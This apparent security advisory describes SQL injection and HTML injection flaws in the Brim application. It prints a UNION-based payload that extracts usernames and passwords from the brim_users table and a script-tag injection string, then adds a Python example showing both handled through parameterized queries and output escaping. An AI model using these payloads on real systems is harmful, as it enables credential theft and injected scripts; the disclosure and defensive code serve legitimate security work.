Brim SQL Injection and HTML Injection Vulnerabilities
Attackers can exploit these issues via a browser. The following examples are available:

To demonstrate the SQL-injection vulnerability, insert the following into any field on the search page:

    ' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*

To demonstrate the HTML-injection vulnerability, add the following as the name for an action within the bookmark plugin:

    >"><script>alert("InjEctOr Team5")</script>
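How the two demonstration strings above behave once the input is bound as a query parameter and encoded on output, as an added example that is not Brim's code (Brim's source is not shown on this page). The schema, the function names `search_bookmarks` and `render_action`, and the markup the action name is rendered into are assumptions made for illustration.

```python
import html
import sqlite3

# Strings quoted from the advisory, used here only as hostile test input.
SQLI_INPUT = ("' union select 1,2,3,4,concat(loginname,0x3a,password),"
              "6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*")
HTML_INPUT = '>"><script>alert("InjEctOr Team5")</script>'


def make_db():
    """Constructed stand-in schema; Brim's real tables are not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE brim_users (loginname TEXT, password TEXT)")
    db.execute("CREATE TABLE bookmarks (owner TEXT, name TEXT)")
    db.execute("INSERT INTO brim_users VALUES ('alice', 'constructed-hash')")
    db.execute("INSERT INTO bookmarks VALUES ('alice', 'Example site')")
    return db


def search_bookmarks(db, owner, term):
    """Hypothetical search handler: the term is bound as data, never SQL text."""
    # Escape LIKE wildcards so user input cannot widen the match either.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    rows = db.execute(
        "SELECT name FROM bookmarks WHERE owner = ? AND name LIKE ? ESCAPE '\\'",
        (owner, f"%{escaped}%"),
    )
    return [r[0] for r in rows]


def render_action(name):
    """Hypothetical view: encode the stored name for attribute and element context."""
    safe = html.escape(name, quote=True)  # encodes & < > " '
    return f'<input type="text" name="action" value="{safe}"><span>{safe}</span>'


if __name__ == "__main__":
    db = make_db()
    print(search_bookmarks(db, "alice", "Example"))
    print(search_bookmarks(db, "alice", SQLI_INPUT))
    print(render_action(HTML_INPUT))
```
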